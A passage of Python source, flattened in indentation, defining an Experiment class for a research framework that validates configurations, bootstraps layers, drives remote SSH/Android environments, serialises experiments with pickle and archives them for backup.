if setting_key in self._config.EXPERIMENT.GENERAL:
elem_keys = list(self._config.EXPERIMENT.GENERAL[setting_key])
for elem_key in elem_keys:
self._config.EXPERIMENT.GENERAL[elem_key] = cp.deepcopy(
self._config.EXPERIMENT.GENERAL[setting_key][elem_key]
)
return self._config
else:
return None
@config.setter
def config(self, value):
self._config = AttributeDict(value)
elem_keys = list(self._config.EXPERIMENT.GENERAL)
if self._config_general_standard not in self._config.EXPERIMENT.GENERAL:
self._config.EXPERIMENT.GENERAL[self._config_general_standard] = AttributeDict()
for key in elem_keys:
if key != self._config_general_standard and key not in list(
self.environments.keys()
):
self._config.EXPERIMENT.GENERAL[self._config_general_standard][
key
] = cp.deepcopy(self._config.EXPERIMENT.GENERAL[key])
@config.deleter
def config(self):
if hasattr(self, "_config"):
delattr(self, "_config")
@property
def run_type(self):
"""Get the associated Run type"""
return self._run_type
@run_type.setter
def run_type(self, value):
"""Set the associated Run type"""
if not (isinstance(value, type) and issubclass(value, Run)):
raise TypeError("run type should be a subclass of Run")
self._run_type = value
def __init__(self, *args, **kwargs):
"""Initialise an Experiment object"""
# Validate root path
if "root_path" in kwargs:
self._root_path = Path(kwargs.pop("root_path"))
else:
self._root_path = Path(".")
validate_root_path(self.root_path)
if self.root_path != Path("."):
get_root_logger().warning(
"creating an experiment with a different root path might complicate "
"reading back"
)
if self.root_path.is_absolute():
get_root_logger().warning(
"creating an experiment with an absolute root path might be difficult "
"to read back by others"
)
# Check git status
if GitRepository.is_git_directory(self.root_path):
repo = GitRepository(self.root_path)
if repo.dirty:
get_root_logger().warning("the repository contains uncommited modifications!")
self._git = {"commit": repo.commit, "dirty": repo.dirty, "status": repo.status}
else:
get_root_logger().warning(
"root path is not a git directory, inconsistencies may occur!"
)
self._git = None
# Initialise the Configurable parent class
Configurable.__init__(self, *args, **kwargs)
# Loggable needs path methods to be available
Loggable.__init__(self, *args, **kwargs)
if "channel" in kwargs:
self.channel = kwargs.pop("channel")
self.channel.parent = self
if "drivers" in kwargs:
self.drivers = kwargs.pop("drivers")
if "run_type" in kwargs:
self.run_type = kwargs.pop("run_type")
self._layers = AttributeDict()
if self.configured:
self.bootstrap()
"""
Bootstrapping
-------------
Values that are always provided to layers at instantiation time:
- Channel,
- Channel's signal.
- sampling period.
Values that are optionally provided to layers at instantiation time:
- Keyword arguments provided to the `bootstrap` function.
"""
def bootstrap(self, **kwargs) -> None:
"""Parse configuration and create experiment layers using a layer factory"""
assert self.configured, "Experiment must be configured before bootstrapping"
assert self.channel, "Experiment must have a channel before bootstrapping"
# broadcast channel and channel's signal to all layers
_env = ""
for item in kwargs.values():
if "env" in item.keys():
_env = item["env"]
break
kwargs.update(
channel=self.channel,
environments_apps_zones=self.environments_apps_zones,
sampling_period=self.environment_config_general(_env).sampling_period,
)
layer_factory = LayerFactory()
layer_conf = self.config.EXPERIMENT.LAYERS
layer_types = {t.value: t for t in layer_factory.available_types}
for layer_k, layer_v in layer_conf.items():
try:
_type = {"_type": layer_types[layer_k]} if layer_k in layer_types else {}
self.layers[layer_k] = layer_factory(
layer_v.name, **_type, **{**layer_v.params, **kwargs}
)
self.logger.info(f"bootstrapped layer {layer_k!r} with {layer_v.name}")
except AttributeError as e:
self.logger.critical(
f"failed to bootstrap layer {layer_k!r} with {layer_v.name}"
)
# Handle missing EXPERIMENT.LAYERS.* as misconfiguration
raise MisconfiguredError(e.args)
self._runtime_encode = AttributeDict(
_ for _ in self.layers.items() if _[1].requires_runtime_config[0]
)
self._runtime_decode = AttributeDict(
_ for _ in self.layers.items() if _[1].requires_runtime_config[1]
)
self.logger.debug(f"layers with runtime encoding: {list(self._runtime_encode)}")
self.logger.debug(f"layers with runtime decoding: {list(self._runtime_decode)}")
self._bootstrapped = True
@property
def bootstrapped(self) -> bool:
"""Are the experiment layers bootstrapped?"""
return getattr(self, "_bootstrapped", False)
@property
def layers(self) -> AttributeDict:
"""Get experiment layers"""
return getattr(self, "_layers", None)
@property
def layers_with_runtime_encoding(self) -> AttributeDict:
"""Get experiment layers that require configuration at runtime"""
return getattr(self, "_runtime_encode", AttributeDict())
@property
def layers_with_runtime_decoding(self) -> AttributeDict:
"""Get experiment layers that require configuration at runtime"""
return getattr(self, "_runtime_decode", AttributeDict())
def configure_layers_encoding(self, **kwargs: t.Any) -> None:
"""Configure layers with runtime-configurable encoding"""
for layer in self.layers_with_runtime_encoding:
if layer in kwargs:
self.layers_with_runtime_encoding[layer].config = kwargs.get(layer, {})
else:
self.logger.debug("layer {layer!r} encoding not runtime-configurable")
def configure_layers_decoding(self, **kwargs: t.Any) -> None:
"""Configure layers with runtime-configurable decoding"""
for layer in self.layers_with_runtime_decoding:
if layer in kwargs:
self.layers_with_runtime_decoding[layer].config = kwargs.get(layer, {})
else:
self.logger.debug("layer {layer!r} decoding not runtime-configurable")
def __repr__(self) -> str:
"""Get a string representation of the Experiment"""
channel = getattr(self, "_channel", None)
channel = channel.__class__.__name__ if channel else "no"
configured = "configured" if self.configured else "not configured"
return (
f"<{self.__class__.__name__} at {hex(id(self))} "
f"with {channel} channel, {configured}>"
)
@property
def required_config_keys(self) -> list:
"""Gets the required config keys
Returns:
list: The required keys
"""
return ["name", "save_path", "EXPERIMENT", "ENVIRONMENTS"]
@staticmethod
def required_layers() -> list:
"""Which layers are required? Used in verification/validation"""
return []
@property
def estimated_delays_duration(self) -> float:
"""Gets the estimated duration of the defined delays
Returns:
float: The estimated delay in seconds
"""
if self.configured:
return (
self.config.EXPERIMENT.GENERAL.delay_after_spawn
if "delay_after_spawn" in self.config.EXPERIMENT.GENERAL
else 1.0
) + (
self.config.EXPERIMENT.GENERAL.delay_after_auxiliary
if "delay_after_auxiliary" in self.config.EXPERIMENT.GENERAL
else 1.0
)
else:
return 0.0
def validate(self) -> None:
"""Check if the supplied Experiment config is valid
Implements the `validate` method from Configurable.
"""
if not self.configured:
raise ConfigMissingError("'validate' called on an unconfigured Experiment")
validate = partial(validate_helper, self.config, msg="Experiment")
# top-level configuration
validate("name", str)
validate("save_path", str)
validate("log_path", str, type(None))
validate("backup_path", str, type(None))
validate("experiment_exists_action", str, type(None))
validate("EXPERIMENT", AttributeDict)
validate("ENVIRONMENTS", AttributeDict)
validate(("EXPERIMENT", "GENERAL"), AttributeDict)
validate(("EXPERIMENT", "GENERAL", "timeout_duration"), (int, float, type(None)))
validate(("EXPERIMENT", "GENERAL", "delay_after_spawn"), (int, float, type(None)))
validate(("EXPERIMENT", "GENERAL", "delay_after_auxiliary"), (int, float, type(None)))
validate(("EXPERIMENT", "GENERAL", "active_wait"), (bool, type(None)))
validate(("EXPERIMENT", "GENERAL", "stagger"), (bool, type(None)))
# environments configuration
for k in self.config["ENVIRONMENTS"]:
validate(("ENVIRONMENTS", k), AttributeDict)
validate(("ENVIRONMENTS", k, "APPS"), AttributeDict)
for app in self.config["ENVIRONMENTS"][k]["APPS"]:
validate(("ENVIRONMENTS", k, "APPS", app, "executable"), str)
validate(("ENVIRONMENTS", k, "APPS", app, "zone"), str)
validate(("ENVIRONMENTS", k, "APPS", app, "type"), str, type(None))
validate(
("ENVIRONMENTS", k, "APPS", app, "start_individually"), bool, type(None)
)
current_app_config = self.config["ENVIRONMENTS"][k]["APPS"][app]
if "type" in current_app_config:
if current_app_config["type"] not in ["local", "standalone"]:
raise MisconfiguredError(
f"App {app!r} in section 'APPS' of environment {k!r} "
f"has incompatible type: {current_app_config['type']!r}, "
f"allowed types: ['local', 'standalone']."
)
if current_app_config["type"] == "local":
validate(("ENVIRONMENTS", k, "APPS", app, "sched"), str, type(None))
else:
validate(("ENVIRONMENTS", k, "APPS", app, "args"), list, type(None))
# experiment configuration
validate(("EXPERIMENT", "type"), str)
validate(("EXPERIMENT", "channel"), str)
validate(("EXPERIMENT", "PHASES"), AttributeDict)
validate(("EXPERIMENT", "LAYERS"), AttributeDict)
missing_layers = [
layer
for layer in self.required_layers()
if layer not in self.config["EXPERIMENT"]["LAYERS"]
]
if missing_layers:
raise MisconfiguredError(f"required layers missing: {missing_layers!r}")
for k in self.config["EXPERIMENT"]["LAYERS"]:
validate(("EXPERIMENT", "LAYERS", k), AttributeDict)
validate(("EXPERIMENT", "LAYERS", k, "name"), str)
validate(("EXPERIMENT", "LAYERS", k, "params"), t.Mapping)
# backup configuration
if "BACKUP" in self.config:
for k in self.config["BACKUP"]:
validate(("BACKUP", k), str)
@staticmethod
def _validate_environment(env: t.Mapping) -> t.NoReturn:
"""Check if provided environment conforms to the specification"""
validate = partial(validate_helper, msg="Environment")
for var in env.values():
# platform
validate(var, "model", str)
validate(var, "cores", t.List)
validate(var, "frequencies", t.List)
validate(var, "schedule_tag", str)
# paths
validate(var, "path_apps", str)
validate(var, "path_data", str)
# driver settings
validate(var, "driver_type", str)
validate(var, "driver_params", t.Mapping)
if var["driver_type"] in ["SSHUnixDriver", "ADBAndroidDriver"]:
# connection
validate(var, ("driver_params", "ip"), str)
validate(var, ("driver_params", "port"), int)
validate(var, ("driver_params", "user"), str)
validate(var, ("driver_params", "group"), str)
validate(var, ("driver_params", "key"), str)
validate(var, ("driver_params", "gateway"), type(None), str)
def _get_environments(self, _ignore: t.Optional[str] = None):
"""Read environments from exot's root directory"""
environments = AttributeDict()
env_dir = self.root_path / "environments"
files = [f for f in env_dir.glob("*.toml") if not f.stem == _ignore]
for file in files:
_ = toml.load(file)
self._validate_environment(_)
environments[file.stem] = AttributeDict.from_dict(_)
return environments
@property
def environments(self) -> AttributeDict:
"""Get available environments"""
if not hasattr(self, "_environments"):
self._environments = AttributeDict.from_dict(self._get_environments())
return self._environments
@environments.setter
def environments(self, value: t.Mapping):
"""Set available environments"""
if not isinstance(value, t.Mapping):
raise TypeError(
f"only a mapping can be assigned to environments, got: {type(value)}"
)
for v in value.values():
self._validate_environment(v)
self._environments = AttributeDict.from_dict(value)
@property
def environments_apps_zones(self) -> t.Mapping:
"""Get a mapping with environments, apps, zones and zone configs
Returns:
t.Mapping: A mapping with the following structure:
- Mapping depth 1: environment name
- Mapping depth 2: apps in the environment
- Mapping depth 3: app zone, zone_config, and app_config,
standalone, sched
"""
_out = {_: {} for _ in self.config.ENVIRONMENTS}
for env in self.config.ENVIRONMENTS:
for app in self.config.ENVIRONMENTS[env]["APPS"]:
_app = self.config.ENVIRONMENTS[env]["APPS"][app]
_zone = _app.zone
_type = _app.get("type", "local")
_start_individually = _app.get("start_individually", False)
if env not in self.environments:
raise MisconfiguredError(
f"The environment {env!r} for app {app!r} is not available; "
f"Available environments: {list(self.environments.keys())!r}"
)
if _zone not in self.environments[env]:
raise MisconfiguredError(
"zone {!r} is not available in environment {!r}".format(_zone, env)
)
_is_standalone = _type == "standalone"
_app_config = {}
if app in self.config.ENVIRONMENTS[env]:
_app_config = self.config.ENVIRONMENTS[env][app]
elif not _is_standalone and app not in self.config.ENVIRONMENTS[env]:
those_that_have = [_ for _ in self.config.ENVIRONMENTS[env] if _ != "APPS"]
raise MisconfiguredError(
f"App {app!r} requires a corresponding configuration in ENVIRONMENTS; "
f"Apps that do have one: {those_that_have!r}"
)
_sched = _app.get("sched", None)
_sched = Path(_sched).name if _sched else _sched
driver_t = self.environments[env][_zone]["driver_type"].lower()
is_unix = "unix" in driver_t
is_android = "android" in driver_t
if not any([is_unix, is_android]):
raise RuntimeError(
f"Both not unix and not Android? Driver type: {driver_t}"
)
_out[env].update(
{
app: {
"executable": _app["executable"],
"type": _type,
"zone": _zone,
"args": _app.get("args", []),
"zone_config": self.environments[env][_zone],
"app_config": _app_config,
"standalone": _is_standalone,
"start_individually": _start_individually,
"sched": _sched,
"is_unix": is_unix,
"is_android": is_android,
}
}
)
return AttributeDict.from_dict(_out)
@property
def available_environments(self) -> list:
"""Get names of available environments"""
assert self.config, "Config must be read first"
assert self.environments, "Environment configurations need to be read first"
envs = list()
for env in self.config.ENVIRONMENTS:
if env not in self.environments:
raise MisconfiguredError(
f"The environment {env} is not in defined environments: "
f"{list(self.environments.keys())}"
)
envs.append(env)
return envs
def environment_config_general(self, env: str) -> AttributeDict:
"""Provides an environment-specific proxy to the general experiment config
Args:
env (str): The environment
Returns:
AttributeDict: The root or environment-specific config
"""
if env in self.config.EXPERIMENT.GENERAL.keys():
environment_config_general = self.config.EXPERIMENT.GENERAL.copy()
for key in environment_config_general[env]:
environment_config_general[key] = environment_config_general[env][key]
del environment_config_general[env]
return environment_config_general
else:
return self.config.EXPERIMENT.GENERAL
@property
def name(self) -> t.Optional[str]:
"""Get experiment name"""
return self.config.name if self.configured else None
@property
def save_path(self) -> t.Optional[Path]:
"""Get save path for experiments"""
return Path.joinpath(self.root_path, self.config.save_path) if self.configured else None
@property
def log_path(self) -> t.Optional[Path]:
"""Get experiment log path"""
if self.configured:
if "log_path" in self.config:
return Path(self.config.log_path)
else:
return Path.joinpath(self.save_path, "_logs")
else:
return None
@property
def path(self) -> t.Optional[Path]:
"""Get the save path of the particular Experiment"""
return Path.joinpath(self.save_path, self.config.name) if self.configured else None
@property
def root_path(self) -> t.Optional[Path]:
"""Get the exot root path"""
return self._root_path
def remote_path(self, env: str, zone: str) -> Path:
"""Get a remote experiment path given an environment and a zone"""
assert isinstance(env, str)
assert isinstance(zone, str)
assert env in self.config.ENVIRONMENTS, "env in config.ENVIRONMENTS"
assert env in self.environments, "env in environments"
assert zone in self.environments[env], "zone in env"
return self.remote_save_path(env, zone) / self.path.relative_to(self.save_path)
def remote_save_path(self, env: str, zone: str) -> Path:
"""Get a remote experiment path given an environment and a zone"""
assert isinstance(env, str)
assert isinstance(zone, str)
assert env in self.config.ENVIRONMENTS, "env in config.ENVIRONMENTS"
assert env in self.environments, "env in environments"
assert zone in self.environments[env], "zone in env"
return Path(self.environments[env][zone].path_data)
@property
def channel(self) -> Channel:
"""Get the configured channel"""
return getattr(self, "_channel", None)
@channel.setter
def channel(self, value: Channel) -> None:
"""Set the experiment channel"""
if not isinstance(value, Channel):
raise TypeError("'channel' should be a Channel-type", value)
self._channel = value
@property
def drivers(self) -> t.Optional[AttributeDict]:
"""Get the experiment drivers
Returns:
t.Optional[AttributeDict]: A mapping: env: str -> zone: str -> driver: Driver
"""
return getattr(self, "_drivers", None)
@drivers.setter
def drivers(self, value: [t.Mapping[str, t.Mapping[str, Driver]]]) -> None:
"""Set the experiment drivers
Args:
value (t.Mapping[str, t.Mapping[str, Driver]]):
A mapping: env: str -> zone: str -> driver: Driver
Raises:
ExperimentTypeError: If keys have wrong types
ExperimentValueError: If a environment or zone is not available
WrongDriverError: If a leaf is not a Driver instance
"""
_paths = get_valid_access_paths(value, _leaf_only=False)
_leaves = leaves(value)
if not all(all(isinstance(_, str) for _ in __) for __ in _paths):
raise ExperimentTypeError("wrong paths in mapping (must be str)", value)
if not all(isinstance(_, Driver) for _ in _leaves):
raise WrongDriverError("drivers must be instances of Driver", value)
_first_level_keys = [_[0] for _ in _paths if len(_) == 1]
_second_level_keys = [_[1] for _ in _paths if len(_) == 2]
for env in _first_level_keys:
if env not in self.environments:
raise ExperimentValueError(f"supplied driver env {env} not available")
for zone in _second_level_keys:
if zone not in [v.zone for v in self.config.APPS.values()]:
raise ExperimentValueError(f"supplied driver zone {zone} not in config")
self._drivers = AttributeDict.from_dict(value)
@property
def phases(self) -> t.Dict:
"""Get experiment phases"""
return getattr(self, "_phases", None)
@phases.setter
def phases(self, value: t.Dict) -> None:
"""Set experiment phases"""
if not isinstance(value, t.Dict):
raise ExperimentValueError(
"value set to 'phases' must be a dict-like object", value
)
self._phases = value
@property
def _update_mode(self) -> bool:
return self.config.experiment_exists_action == "update"
def write(self) -> None:
"""Serialise the experiment"""
assert self.configured, "Experiment must be configured before writing"
assert self.bootstrapped, "Experiment must be bootstrapped before writing"
if any(isabstract(layer) for layer in self.layers):
raise SerialisingAbstractError("cannot serialise abstract classes")
# handle existing experiment path
if self.path.exists():
# experiment_exists_action exists in the config
if hasattr(self.config, "experiment_exists_action"):
if self.config.experiment_exists_action == "overwrite":
self.logger.info(
f"experiment path '{self.path}' already exists, will be overwritten"
)
delete(self.path)
elif self.config.experiment_exists_action == "move":
self.logger.info(move_action(self.path))
elif self.config.experiment_exists_action == "update":
pass
else:
raise ExperimentAbortedError("experiment directory existed")
# experiment_exists_action does not exist in the config, prompt user
else:
proceed = prompt(
f"destination path {self.path} exists, move the old one and proceed"
)
if proceed:
self.logger.info(move_action(self.path))
else:
raise ExperimentAbortedError("experiment directory existed")
if not self._update_mode:
if self.path.exists():
raise ExperimentRuntimeError(f"{self.path} shouldn't exist before serialising")
self.path.mkdir(parents=True, exist_ok=self._update_mode)
# NOTE [ACCESS_PATHS]: saving these might not be eventually required
# NOTE: generator objects cannot be pickled/serialised
self._phases_access_paths = list(get_valid_access_paths(self.phases, _leaf_only=True))
# fmt: off
# Write the experiment's configuration, metadata, and available environments
with self.path.joinpath("_configuration.toml").open("w") as cfgfile,\
self.path.joinpath("_metadata.toml").open("w") as gitfile,\
self.path.joinpath("_environments.toml").open("w") as envfile:
toml.dump(self.config.as_dict(), cfgfile)
toml.dump({"git": self._git}, gitfile)
toml.dump(self.environments.as_dict(), envfile)
# fmt: on
# Serialise the experiment object
pickle_path = self.path / "_experiment.pickle"
self.serialise(pickle_path)
self.logger.debug(f"serialised experiment '{self.name}' to '{pickle_path}'")
# Serialise all 'owned' Run objects
def call_run_write(run):
if not isinstance(run, Run):
raise ExperimentTypeError("a run in phases not an instance of Run", run)
run.write()
call_with_leaves(call_run_write, self.phases)
@classmethod
def read(
cls,
path: Path,
new_root_path: t.Optional[Path] = None,
*,
diff_and_replace: bool = False,
) -> Experiment:
"""Read a serialised Experiment and produce an Experiment instance
Args:
path (Path): The path to the serialised experiment
new_root_path (t.Optional[Path], optional): A new root path
diff_and_replace (bool, optional): Do file diff and replace values from the instance with those from files?
Returns:
Experiment: A restored instance of Experiment
Raises:
WrongRootPathError: If saved and current root paths cannot be resolved
"""
instance = cls.deserialise(path)
get_root_logger().info(f"unpicked an experiment instance {instance}")
_original_cwd = Path.cwd()
if new_root_path and new_root_path.resolve() != _original_cwd:
os.chdir(new_root_path)
# Handle reading experiments from moved directories, especially those moved
# automatically by the framework. `path.parts[-1]` is the picke file.
#
# Note: this may fail when there are stark differences in how experiments are placed.
_save_path = path.parts[-3]
_name = path.parts[-2]
if instance.config.save_path != _save_path:
instance.config.save_path = _save_path
if instance.config.name != _name:
instance.config.name = _name
try:
# Check if the current and the saved root path resolve to a valid root path
validate_root_path(instance.root_path)
if new_root_path:
instance._root_path = new_root_path
except WrongRootPathError:
get_root_logger().critical(
f"the pickled root path {cls.root_path} and current working directory "
f"'{Path.cwd()}' does not resolve to a valid root path."
)
raise WrongRootPathError(Path.cwd() / instance.root_path)
finally:
os.chdir(_original_cwd)
_need_bootstrap = False
# Check if saved config differs from that in the file
contained_config = instance.path / "_configuration.toml"
if contained_config.exists() and diff_and_replace:
config_from_directory = toml.load(contained_config)
differences = dict_diff(instance.config, config_from_directory)
if differences:
_need_bootstrap = True
get_root_logger().warning(
f"configs from pickle and directory differ at {differences!r}"
)
instance.config = config_from_directory
# Check if saved environments differ from those in the file
contained_environments = instance.path / "_environments.toml"
if contained_environments.exists() and diff_and_replace:
environments_from_directory = toml.load(contained_environments)
differences = dict_diff(instance.environments, environments_from_directory)
if differences:
_need_bootstrap = True
get_root_logger().warning(
f"environments from pickle and directory differ at {differences!r}"
)
instance.environments = environments_from_directory
# Check status of the git repository
if getattr(instance, "_git", None):
if GitRepository.is_git_directory(instance.root_path):
repo = GitRepository(instance.root_path)
if repo.commit != instance._git["commit"]:
get_root_logger().error(
"git commit of unpickled experiment repo '{}' does not match "
"the commit in which the unpickling was performed '{}'".format(
instance._git["commit"][:8], repo.commit[:8]
)
)
if repo.dirty:
get_root_logger().warning("unpickling in a dirty git repository")
else:
get_root_logger().warning(
f"unpickled in a directory that is not a git directory"
)
if _need_bootstrap:
instance.bootstrap()
# Populate the experiment phases and read existing Run's
instance.phases = {tag: {} for tag in instance.config.EXPERIMENT.PHASES}
instance.estimated_duration = {
tag: instance.config.EXPERIMENT.GENERAL.delay_after_bootstrap
if "delay_after_bootstrap" in instance.config.EXPERIMENT.GENERAL
else 10.0
for tag in instance.config.EXPERIMENT.PHASES
}
# Deserialise all contained Runs
for pickled_run in instance.path.rglob("*/_run.pickle"):
run_query = run_path_unformatter(pickled_run)
# NOTE [ACCESS_PATHS]: setitem will only allow setting existing keys, but
# these can be checked explicitly, as long as access paths are available.
if not (run_query in instance._phases_access_paths):
get_root_logger().warning(f"{run_query!r} must be a valid query")
setitem(
instance.phases,
run_query,
instance.run_type.read(pickled_run, parent=instance),
force=True,
)
instance._phases_access_paths = list(
get_valid_access_paths(instance.phases, _leaf_only=True)
)
return instance
instance = integrate(instance)
def backup(self, _with_logs: bool = False, _with_results: bool = False) -> None:
"""Archive an Experiment and, if possible, upload to a backup server
Args:
_with_logs (bool, optional): Backup contained experiment logs?
_with_results (bool, optional): Backup contained experiments results?
Raises:
InvalidBackupPathError: If backup path is invalid
"""
assert self.configured, "experiment must be configured before backing up"
assert self.path.exists(), "experiment must be serialised before backing up"
if getitem(self.config, "backup_path", None):
where = self.root_path / Path(self.config.backup_path)
else:
where = self.save_path / "_backup"
if not where.is_dir():
try:
where.mkdir(parents=True)
except OSError as e:
_ = InvalidBackupPathError(f"backup path '{where}' not valid")
_.args += (e, e.args)
raise _
file = Path("{}.tbz".format(self.config.name))
file = add_timestamp(file)
path = Path.joinpath(where, file)
self.logger.info(f"archiving experiment '{self.name}' in '{path}'")
files_to_backup = (
f
for f in self.path.glob("**/*.*")
if not (
(_with_logs and "_logs" in f.parent.parts)
or (_with_results and "_results" in f.parent.parts)
)
)
with tarfile.open(path, "x:bz2") as _:
for file in files_to_backup:
_.add(file)
# If BACKUP section is available in the config, attempt to send the archive
if self.configured and "BACKUP" in self.config:
self.logger.info(f"sending experiment '{self.name}' archive to remote backup")
_ = file_backup(path, self.config.BACKUP.as_dict())
if not _.ok:
self.logger.error(
f"failed to send experiment archive, exited: {_.exited}, "
f"stderr: {_.stderr}"
)
@abc.abstractmethod
def generate(self) -> None:
"""Populate the experiment phases and instantiate Run's
Preconditions:
- The experiment should be configured and bootstrapped.
"""
pass
"""
The following methods are used to estimate the duration of the experiment.
"""
@property
def estimated_duration(self) -> t.Dict:
"""Get durations of experiment phases"""
return getattr(self, "_estimated_duration", None)
@estimated_duration.setter
def estimated_duration(self, value: t.Dict) -> None:
"""Set experiment phases"""
if not isinstance(value, t.Dict):
raise ExperimentValueError(
"value set to 'duration' must be a dict-like object", value
)
self._estimated_duration = value
def print_duration(self) -> None:
"""Prints the estimated experiment duration
"""
assert self.estimated_duration, "Experiment must be generated first"
total_duration = 0
for phase in self._estimated_duration:
time = datetime.timedelta(seconds=self.estimated_duration[phase])
self.logger.info(
f"Estimated duration of a single repetition of the {phase} phase is {str(time)}"
)
total_duration += (
self._estimated_duration[phase]
* self.config["EXPERIMENT"]["PHASES"][phase]["repetitions"]
)
time = datetime.timedelta(seconds=(total_duration))
self.logger.info(
f"This results in a total estimated duration of {str(time)} for all repetitions."
)
def map_to_runs(
self, function: t.Callable[[t.Any], t.Any], *, parallel: bool = True
) -> t.Generator:
"""Map a function to the Runs concurrently
Args:
function (t.Callable[[t.Any], t.Any]): A callable with sig. (Any) -> Any
parallel (bool, optional): run callable concurrently?
Returns:
t.Generator: The executor map generator
"""
if parallel:
with concurrent.futures.ThreadPoolExecutor(
thread_name_prefix="MapperThread"
) as executor:
return executor.map(function, leaves(self.phases))
else:
return map(function, leaves(self.phases))
def _create_drivers(self) -> t.Mapping:
"""Create experiment drivers
Returns:
t.Mapping: A mapping with environment as the 1st level, zone as the 2nd,
leaves are Driver objects created with a DriverFactory
Raises:
DriverCreationError: If driver could not be instantiated
"""
assert self.configured, "must be configured before adding drivers"
assert self.environments, "must have environments before adding drivers"
driver_factory = DriverFactory()
drivers = {k: {} for k in self.config.ENVIRONMENTS}
for env in drivers:
for app in self.config.ENVIRONMENTS[env].APPS:
try:
_zone = self.config.ENVIRONMENTS[env].APPS[app].zone
_zone_params = self.environments[env][_zone]
_driver_type = _zone_params["driver_type"]
_driver_params = _zone_params["driver_params"]
drivers[env][_zone] = driver_factory(_driver_type, backend=_driver_params)
except (KeyError, AttributeError) as e:
raise DriverCreationError(e)
return drivers
def _validate_execute(self, env: str) -> t.NoReturn:
"""Verify that the experiment can be executed
Also creates drivers, if they're not available.
Raises:
ExperimentRuntimeError: If an experiment Run is not digested
MisconfiguredError: If the execution cannot be performed due to config
"""
assert self.configured, "must be configured before execution"
assert self.bootstrapped, "must be bootstrapped before execution"
assert self.environments, "must have environments before execution"
# check for missing environments
_ = [env_k for env_k in self.config.ENVIRONMENTS if env_k not in self.environments]
if _:
msg = "environments {m!r} in config not in available ({a!r})".format(
m=_, a=list(self.environments.keys())
)
self.logger.critical(msg)
raise MisconfiguredError(msg)
# check for missing zones
for env_k in self.config.ENVIRONMENTS:
for app_k, app_v in self.config.ENVIRONMENTS[env_k].APPS.items():
if app_v.zone not in self.environments[env_k]:
msg = "zone {z!r} of app {a!r} not available for env {e!r}".format(
z=app_v.zone, a=app_k, e=env_v
)
self.logger.critical(msg)
raise MisconfiguredError(msg)
# check if runs are digested
if any(not run.digested for run in leaves(self.phases)):
msg = "some experiment runs were not digested"
self.logger.critical(msg)
raise ExperimentRuntimeError(msg)
# check if drivers are created
if self.drivers:
for driver in leaves(self.drivers):
try:
driver.disconnect()
except (AssertionError, RuntimeError):
pass
self.drivers = self._create_drivers()
# Connection check only necessary for actual environment
if not all(_.can_connect() for _ in leaves(self.drivers[env])):
msg = "at least one driver cannot connect"
self.logger.critical(msg)
raise MisconfiguredError(msg)
@property
def execution_status(self) -> dict:
"""Gets the experiment execution status
The execution status has the following form:
{
<phase_key>: {
<run_key>: [
(<env name 1>, [True, True, ..., False]),
(<env name 2>, [True, True, ..., False]),
...
],
...
},
...
}
Returns:
dict: A dict with a structure like `phases`, with lists as leaves, containing
tuples (env, [executed runs]).
"""
return map_to_leaves(
lambda run: [
(env, list(v.values()))
# for env, v in run.infer_execution_status(update=update_runs).items()
for env, v in run.execution_status.items()
],
self.phases,
_seq=False,
)
def infer_execution_status(self) -> dict:
"""Infers the execution status from contained Runs, optionally update self and Runs
Args:
Returns:
Raises:
TypeError: Wrong types provided to keyword arguments
"""
for phase in self.phases.values():
for run in phase.values():
run.infer_execution_status().items()
def _modify_execution_status(
self, env: str, query: t.Union[str, tuple], value: bool, *, push: bool = False
) -> None:
"""Modifies the execution status of experiment's phases and runs
Args:
env (str): The environment
query (t.Union[str, tuple]): The query to `getitem`
value (bool): The value to set
push (bool, optional): Push to runs?
"""
query_result = getitem(self.execution_status, query)
index_of_env = query_result.index(next(_ for _ in query_result if _[0] == env))
setitem(self.execution_status, query + (index_of_env,), (env, value))
if push:
self._push_execution_status()
def _push_execution_status(self) -> None:
"""Pushes execution status to experiment's runs
"""
for stats, run in zip(leaves(self.execution_status), leaves(self.phases)):
for env, rep_stats in stats:
run._execution_status[env] = {i: v for i, v in enumerate(rep_stats)}
def execute_in_environment(
self, env: str, phases: t.List[str], resume: bool = False
) -> None:
"""Executes the experiment in a specific environment
Args:
env (str): The environment
phases (t.List[str]): The phases to execute
resume (bool, optional): Resume execution?
Returns:
None: If no phases are executed
Raises:
ExperimentAbortedError: Interrupted by the user or options are mismatched
ExperimentRuntimeError: Failed to send or timed out
TypeError: Wrong type supplied to 'phases'
ValueError: Any of the provided phases were not available
"""
if resume and not getattr(self, "_update_mode", False):
self.logger.critical(
"'resume' should only be used if the 'experiment_exists_action' is 'update'"
)
proceed = prompt(
f"Do you want to continue resuming execution in env: {env!r} "
"with experiment action 'overwrite'"
)
if not proceed:
raise ExperimentAbortedError("Aborted due to 'resume' settings.")
if not isinstance(phases, t.List):
raise TypeError(f"'phases' must be a list, got: {type(phases)}")
invalid_phases = [_ for _ in phases if _ not in self.phases]
if invalid_phases:
raise ValueError(f"some/all of provided phases not available: {invalid_phases}")
self._validate_execute(env)
phases_to_execute = {
phase: values for phase, values in self.phases.items() if phase in phases
}
if not phases_to_execute:
self.logger.warning(f"no phases specified ({phases!r}), exiting")
return None
runs = (
# If resuming, pick runs that have at least one rep that has not been executed...
(
run
for run in leaves(phases_to_execute)
if not all(list(run.execution_status[env].values()))
)
if resume
# Otherwise, pick all runs.
else leaves(phases_to_execute)
)
bootstrapping_driver = None
_general = self.environment_config_general(env)
try:
for run in runs:
self.logger.info(f"executing phases: {phases!r} in env {env!r}")
if True:
# try:
run.send(env)
run.env_path(env).mkdir(parents=True, exist_ok=True)
run.drivers_proxy = self.drivers[env]
for zone, driver in self.drivers[env].items():
driver.mkdir(str(run.remote_env_path(env, zone)), parents=True)
if not bootstrapping_driver:
bootstrapping_driver = (zone, driver)
self.logger.info(f"{env}->{zone}: configuring to {_general}")
driver.setstate(**_general)
_ = driver.getstate()
self.logger.debug(f"{env}->{zone}: current state: {_}")
run.execute(env, resume=resume)
run.fetch_and_cleanup(env)
# except (KeyboardInterrupt, SystemExit) as e:
# raise
# except Exception as e:
# self.logger.critical(f"{env}: exception: {e} in run {run}")
except (KeyboardInterrupt, SystemExit) as e:
self.logger.critical(f"{env}: execution interrupted: {type(e)}")
raise
finally:
for zone, driver in self.drivers[env].items():
if not driver.backend.connected:
driver.backend.connect()
if (zone, driver) == bootstrapping_driver:
self.logger.info(f"{env}->{zone}: cleaning up")
# clean up explicitly before disconnecting to log/inspect state
driver.cleanup()
self.logger.debug(f"{env}->{zone}: cur. state: {driver.getstate()!r}")
delete_ok = driver.delete(path=str(self.remote_path(env, zone)), recursive=True)
self.logger.info(
f"{env}->{zone}: {'successfully' if delete_ok else 'failed to'} "
